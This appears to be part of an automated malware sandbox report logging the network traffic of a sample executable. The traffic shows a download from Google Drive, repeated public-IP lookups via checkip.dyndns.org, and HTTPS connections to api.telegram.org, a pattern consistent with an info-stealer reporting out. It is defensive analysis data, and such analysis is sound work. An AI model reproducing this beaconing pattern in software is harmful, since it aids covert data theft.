Jan 10, 2025 22:44:48.979495049 CET	443	50078	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:49.027653933 CET	50077	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:49.591344118 CET	443	50078	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:49.592994928 CET	50078	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:49.593020916 CET	443	50078	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:49.593256950 CET	50078	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:49.593262911 CET	443	50078	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:50.021200895 CET	443	50078	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:50.021294117 CET	443	50078	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:50.021332979 CET	50078	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:50.022082090 CET	50078	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:50.049223900 CET	50077	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:50.050496101 CET	50079	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:50.054122925 CET	80	50077	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:50.054174900 CET	50077	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:50.055263042 CET	80	50079	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:50.055329084 CET	50079	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:50.055474043 CET	50079	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:50.060168982 CET	80	50079	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:50.655878067 CET	80	50079	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:50.684740067 CET	50080	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:50.684792995 CET	443	50080	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:50.684854984 CET	50080	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:50.697173119 CET	50080	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:50.697200060 CET	443	50080	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:50.699505091 CET	50079	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:51.323951960 CET	443	50080	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:51.329185009 CET	50080	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:51.329224110 CET	443	50080	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:51.329296112 CET	50080	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:51.329304934 CET	443	50080	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:51.657267094 CET	443	50080	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:51.657459021 CET	443	50080	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:51.657525063 CET	50080	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:51.657802105 CET	50080	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:51.660707951 CET	50079	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:51.661818027 CET	50081	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:51.665815115 CET	80	50079	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:51.665904045 CET	50079	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:51.666589022 CET	80	50081	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:51.666660070 CET	50081	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:51.666868925 CET	50081	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:51.671633005 CET	80	50081	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:52.233449936 CET	80	50081	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:52.248425007 CET	50082	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:52.248529911 CET	443	50082	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:52.248655081 CET	50082	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:52.248914003 CET	50082	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:52.248953104 CET	443	50082	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:52.277698994 CET	50081	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:52.857386112 CET	443	50082	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:52.858982086 CET	50082	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:52.859018087 CET	443	50082	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:52.859081030 CET	50082	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:52.859086990 CET	443	50082	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:53.187787056 CET	443	50082	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:53.187870026 CET	443	50082	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:53.187920094 CET	50082	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:56.208432913 CET	50082	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:56.211836100 CET	50081	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:56.212853909 CET	50083	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:56.216895103 CET	80	50081	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:56.216949940 CET	50081	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:56.217617989 CET	80	50083	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:56.217683077 CET	50083	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:56.217771053 CET	50083	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:56.222507000 CET	80	50083	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:56.801354885 CET	80	50083	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:56.802424908 CET	50084	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:56.802478075 CET	443	50084	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:56.802561998 CET	50084	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:56.802835941 CET	50084	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:56.802851915 CET	443	50084	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:56.855796099 CET	50083	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:57.414783001 CET	443	50084	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:57.465126991 CET	50084	443	192.168.2.6	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 22:43:22.909971952 CET	55293	53	192.168.2.6	1.1.1.1
Jan 10, 2025 22:43:22.917140961 CET	53	55293	1.1.1.1	192.168.2.6
Jan 10, 2025 22:43:24.058732033 CET	64106	53	192.168.2.6	1.1.1.1
Jan 10, 2025 22:43:24.068572998 CET	53	64106	1.1.1.1	192.168.2.6
Jan 10, 2025 22:43:29.149415016 CET	61870	53	192.168.2.6	1.1.1.1
Jan 10, 2025 22:43:29.156164885 CET	53	61870	1.1.1.1	192.168.2.6
Jan 10, 2025 22:43:30.679167032 CET	51365	53	192.168.2.6	1.1.1.1
Jan 10, 2025 22:43:30.686870098 CET	53	51365	1.1.1.1	192.168.2.6
Jan 10, 2025 22:43:37.240051985 CET	56797	53	192.168.2.6	1.1.1.1
Jan 10, 2025 22:43:37.246711969 CET	53	56797	1.1.1.1	192.168.2.6
Jan 10, 2025 22:43:44.171865940 CET	56040	53	192.168.2.6	1.1.1.1
Jan 10, 2025 22:43:44.179549932 CET	53	56040	1.1.1.1	192.168.2.6
Jan 10, 2025 22:44:52.236747980 CET	50064	53	192.168.2.6	1.1.1.1
Jan 10, 2025 22:44:52.244582891 CET	53	50064	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 22:43:22.909971952 CET	192.168.2.6	1.1.1.1	0x46b2	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:43:24.058732033 CET	192.168.2.6	1.1.1.1	0xcbb3	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:43:29.149415016 CET	192.168.2.6	1.1.1.1	0xb23e	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:43:30.679167032 CET	192.168.2.6	1.1.1.1	0xc940	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:43:37.240051985 CET	192.168.2.6	1.1.1.1	0x94fe	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:43:44.171865940 CET	192.168.2.6	1.1.1.1	0xfe00	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:44:52.236747980 CET	192.168.2.6	1.1.1.1	0x1d32	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 22:43:22.917140961 CET	1.1.1.1	192.168.2.6	0x46b2	No error (0)	drive.google.com		142.250.186.142	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:43:24.068572998 CET	1.1.1.1	192.168.2.6	0xcbb3	No error (0)	drive.usercontent.google.com		172.217.18.97	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:43:29.156164885 CET	1.1.1.1	192.168.2.6	0xb23e	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 22:43:29.156164885 CET	1.1.1.1	192.168.2.6	0xb23e	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:43:29.156164885 CET	1.1.1.1	192.168.2.6	0xb23e	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:43:29.156164885 CET	1.1.1.1	192.168.2.6	0xb23e	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:43:29.156164885 CET	1.1.1.1	192.168.2.6	0xb23e	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:43:29.156164885 CET	1.1.1.1	192.168.2.6	0xb23e	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:43:30.686870098 CET	1.1.1.1	192.168.2.6	0xc940	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:43:30.686870098 CET	1.1.1.1	192.168.2.6	0xc940	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:43:30.686870098 CET	1.1.1.1	192.168.2.6	0xc940	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:43:30.686870098 CET	1.1.1.1	192.168.2.6	0xc940	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:43:30.686870098 CET	1.1.1.1	192.168.2.6	0xc940	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:43:30.686870098 CET	1.1.1.1	192.168.2.6	0xc940	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:43:30.686870098 CET	1.1.1.1	192.168.2.6	0xc940	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:43:37.246711969 CET	1.1.1.1	192.168.2.6	0x94fe	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:43:44.179549932 CET	1.1.1.1	192.168.2.6	0xfe00	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 22:43:44.179549932 CET	1.1.1.1	192.168.2.6	0xfe00	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:43:44.179549932 CET	1.1.1.1	192.168.2.6	0xfe00	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:43:44.179549932 CET	1.1.1.1	192.168.2.6	0xfe00	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:43:44.179549932 CET	1.1.1.1	192.168.2.6	0xfe00	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:43:44.179549932 CET	1.1.1.1	192.168.2.6	0xfe00	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:44:52.244582891 CET	1.1.1.1	192.168.2.6	0x1d32	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49910	132.226.8.169	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:43:29.165944099 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:43:30.056500912 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:43:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 22:43:30.063294888 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 22:43:30.356193066 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:43:30 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 22:43:36.955414057 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 22:43:37.235462904 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:43:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49973	132.226.8.169	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:43:38.457655907 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 22:43:39.295414925 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:43:39 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49984	132.226.8.169	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:43:40.418509007 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:43:41.236248016 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:43:41 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49991	132.226.8.169	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:43:42.203737974 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:43:43.095438004 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:43:42 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49994	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:43:44.185894012 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:43:44.751507044 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:43:44 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ddd3871952a2b3af545697de4da71910 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49996	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:43:45.717025042 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:43:46.293987989 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:43:46 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d3fafd2a6bad22661480c248c7ac5b8b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49998	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:43:47.367672920 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:43:47.962541103 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:43:47 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0813f0868eba27acbc1002532db110bd Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	50000	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:43:48.821504116 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:43:49.425270081 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:43:49 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b7f4f61ad0b776d6ea41fd4bd434c119 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	50002	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:43:50.879101992 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:43:51.652462006 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:43:51 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 79ca9c28536479bb9695e936e9042788 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	50004	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:43:52.524235964 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:43:53.115761995 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:43:53 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a3e25d91a915b7c2277532d0830f1961 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	50006	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:43:53.975125074 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
